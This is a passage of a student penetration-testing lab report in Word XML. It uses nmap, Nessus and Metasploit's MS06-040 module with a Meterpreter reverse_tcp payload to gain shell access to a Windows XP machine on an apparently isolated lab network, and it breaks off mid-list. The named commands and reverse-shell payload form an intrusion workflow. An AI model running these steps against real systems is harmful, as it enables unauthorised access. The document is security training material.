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6C4C8E" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="00A03D23"/>
    <w:p w14:paraId="6FC1C537" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23">
      <w:r w:rsidRPr="00925827">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00B85856">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit Project</w:t>
      </w:r>
      <w:r w:rsidRPr="00925827">
        <w:t> is a </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tooltip="Computer security" w:history="1">
        <w:r w:rsidRPr="00925827">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>computer security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00925827">
        <w:t> project that provides information about </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="Vulnerability (computer science)" w:history="1">
        <w:r w:rsidRPr="00925827">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>security vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00925827">
        <w:t> and</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t xml:space="preserve"> aids inpenetration tests</w:t>
      </w:r>
      <w:r w:rsidRPr="00925827">
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tooltip="Intrusion-detection system" w:history="1">
        <w:r w:rsidRPr="00925827">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>IDS signature</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00925827">
        <w:t> development.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00925827">
        <w:t>Its best-known sub-project is the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="Open source" w:history="1">
        <w:r w:rsidRPr="00925827">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>open source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00925827">
        <w:t> Metasploit Framework, a tool for developing and executing </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tooltip="Exploit (computer security)" w:history="1">
        <w:r w:rsidRPr="00925827">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00925827">
        <w:t> code against a remote target machine.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B7C2D1" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23">
      <w:r>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t>lab2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we found vulnerability in the </w:t>
      </w:r>
      <w:r w:rsidRPr="000E680B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows XP Machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> having </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IP address 10.10.111.110</w:t>
      </w:r>
      <w:r w:rsidRPr="000E680B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t xml:space="preserve"> In this lab, we will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be hacking into the windows XP machine using metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t xml:space="preserve"> as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB9C53C" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23"/>
    <w:p w14:paraId="74D06BA1" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRPr="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E680B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the BackTrack5 machine check the IP address of the machine we are working with. The IP address is </w:t>
      </w:r>
      <w:r w:rsidRPr="000E680B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.10.111.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABE01B6" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00E557EA" w:rsidP="00A03D23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CEB8976" wp14:editId="43052997">
            <wp:extent cx="5932805" cy="3710940"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 7.09.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Home/Desktop/Screen Shot 2016-02-28 at 7.09.16 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665497A1" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23"/>
    <w:p w14:paraId="5649E6B6" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23"/>
    <w:p w14:paraId="6C24AB2E" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23"/>
    <w:p w14:paraId="55C80676" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRPr="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A03D23">
        <w:t xml:space="preserve">Using the nmap procedure </w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t>as lab2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:t xml:space="preserve">, we are again checking the vulnerabilities in the XP machine. We can see vulnerabilities on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>5 open ports.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:t xml:space="preserve"> The IP ad</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t>dress for windows XP machine is</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>10.10.111.110</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ACB55B" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23"/>
    <w:p w14:paraId="7DB651C0" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="566B2FF4" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="691B918F" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00E557EA" w:rsidP="00A03D23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49BD7EB4" wp14:editId="05B29F74">
            <wp:extent cx="5932805" cy="3710940"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 7.1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Home/Desktop/Screen Shot 2016-02-28 at 7.17.44 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61AC06B2" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23"/>
    <w:p w14:paraId="1F89BC26" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23"/>
    <w:p w14:paraId="0203BD59" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00C97FE2" w:rsidP="00A03D23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="00A03D23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A03D23" w:rsidRPr="00A03D23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and perform</w:t>
      </w:r>
      <w:r w:rsidR="00A03D23">
        <w:t xml:space="preserve"> a scan on the IP address range of 10.10.111.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6483B401" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="309BD35F" wp14:editId="6508C01F">
            <wp:extent cx="5930985" cy="3452805"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="6" name="Picture 6" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 7.57.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Home/Desktop/Screen Shot 2016-02-28 at 7.57.21 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554" cy="3458376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D7ECE" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="541679A7" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="7D45ED2E" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BBF5296" wp14:editId="15CFF87F">
            <wp:extent cx="5932805" cy="3710940"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 7.46.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Home/Desktop/Screen Shot 2016-02-28 at 7.46.55 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7EA90507" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="3532DF8B" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00E557EA" w:rsidP="00A03D23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="667CD5DC" wp14:editId="5E253BD3">
            <wp:extent cx="5932805" cy="3710940"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 7.50.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Home/Desktop/Screen Shot 2016-02-28 at 7.50.58 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7BB6B707" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23"/>
    <w:p w14:paraId="2B987816" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23" w:rsidP="00A03D23"/>
    <w:p w14:paraId="1343B73E" w14:textId="77777777" w:rsidR="00542B8B" w:rsidRDefault="00A03D23" w:rsidP="00A03D23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In the report we can see that the XP Machine (10.10.111.1</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>) has a total of</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 45 vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4 high vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="003A6FAA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>we can view the details of the port with the most vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="003A6FAA">
        <w:t xml:space="preserve"> by clicking on a specific port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. We observe that </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>port number 445</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has the most vulnerability with </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03D23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>10 high vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="003A6FAA">
        <w:t xml:space="preserve"> On clicking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we can see the plugin ids and the name of the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D9716F" w14:textId="77777777" w:rsidR="00542B8B" w:rsidRDefault="00542B8B" w:rsidP="00542B8B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="557504DD" wp14:editId="05486BC1">
            <wp:extent cx="5943600" cy="2729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0832" b="7522"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2729230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE173BB" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="00542B8B"/>
    <w:p w14:paraId="7321C6EA" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="00542B8B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="465A79F2" wp14:editId="1805008C">
            <wp:extent cx="5943600" cy="31771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3110" b="7567"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3177157"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8F41E" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="00542B8B"/>
    <w:p w14:paraId="2B1A1F81" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="00542B8B"/>
    <w:p w14:paraId="24377467" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="00542B8B"/>
    <w:p w14:paraId="7E795367" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="00542B8B"/>
    <w:p w14:paraId="0F819B45" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1" w:rsidP="009053A1"/>
    <w:p w14:paraId="7A2E5B7D" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRPr="009053A1" w:rsidRDefault="00C97FE2" w:rsidP="009053A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="009053A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tart the metasploit in the terminal by using the command </w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="00B85856">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="009053A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. I have selected MS06-040</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="009053A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gave a command </w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="00B85856">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search MS 06-040.</w:t>
      </w:r>
      <w:r w:rsidR="009053A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This command gives the details of the vulnerability.  We could see that the</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="00B85856">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rank of this vulnerability is great.</w:t>
      </w:r>
      <w:r w:rsidR="009053A1">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009053A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We then need to execute a command </w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="00AB5C84">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidR="009053A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by the Name of the vulnerability we got from the search command.  </w:t>
      </w:r>
      <w:r w:rsidR="003A6FAA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Using show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we find that there is no rhost and lhost set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F78B7CE" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="35303B2B" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F2C737" wp14:editId="06D13FFB">
            <wp:extent cx="5943600" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 14" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.3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Home/Desktop/Screen Shot 2016-02-28 at 9.39.34 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165AB897" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="316835C6" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1"/>
    <w:p w14:paraId="05E3BA42" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1" w:rsidP="009053A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We are now setting the IP address of the </w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>indows XP machine (10.10.111.110</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>) as rhost.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> We can see that it responds us that it has successfully added the Windows XP IP address. Now, to gain the</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the victim’s machine and transfer a file from victim’s machine to our machine, we need to execute the command</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> set payload windows/meterpreter/reverse_tcp.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> By again executing the command show options, we can see that the RHOST has been set to the Windows XP IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6D3AD7" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1" w:rsidP="009053A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24904019" wp14:editId="4CF7D699">
            <wp:extent cx="5932805" cy="3444875"/>
            <wp:effectExtent l="0" t="0" r="10795" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.39.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Home/Desktop/Screen Shot 2016-02-28 at 9.39.52 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805" cy="3444875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576FACF" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1" w:rsidP="009053A1"/>
    <w:p w14:paraId="5080B396" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1" w:rsidP="009053A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By using a similar command for LHOST, we </w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>set that listening port IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> address as our own IP Address (10.10.111.107) and executing the command show options, we can see that the Listening host has been successfully set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747659E8" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF08B6A" wp14:editId="5921478F">
            <wp:extent cx="5932805" cy="3498215"/>
            <wp:effectExtent l="0" t="0" r="10795" b="6985"/>
            <wp:docPr id="13" name="Picture 13" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.4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Home/Desktop/Screen Shot 2016-02-28 at 9.40.06 P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805" cy="3498215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B640001" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="466127C4" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="183F585B" w14:textId="77777777" w:rsidR="009053A1" w:rsidRPr="009053A1" w:rsidRDefault="009053A1" w:rsidP="009053A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve">We then launch the exploit. Then a </w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Meterpreter console starts with a meterpreter session.</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> So,</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> we have successfully launched the exploit and hacked the victim’s machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D5FD8" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="54C2B191" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CC321EC" wp14:editId="14F946EF">
            <wp:extent cx="5932805" cy="3498215"/>
            <wp:effectExtent l="0" t="0" r="10795" b="6985"/>
            <wp:docPr id="16" name="Picture 16" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.43.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sers/Home/Desktop/Screen Shot 2016-02-28 at 9.43.14 P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2805" cy="3498215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22E82F" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1"/>
    <w:p w14:paraId="72322B1D" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1" w:rsidP="009053A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009053A1">
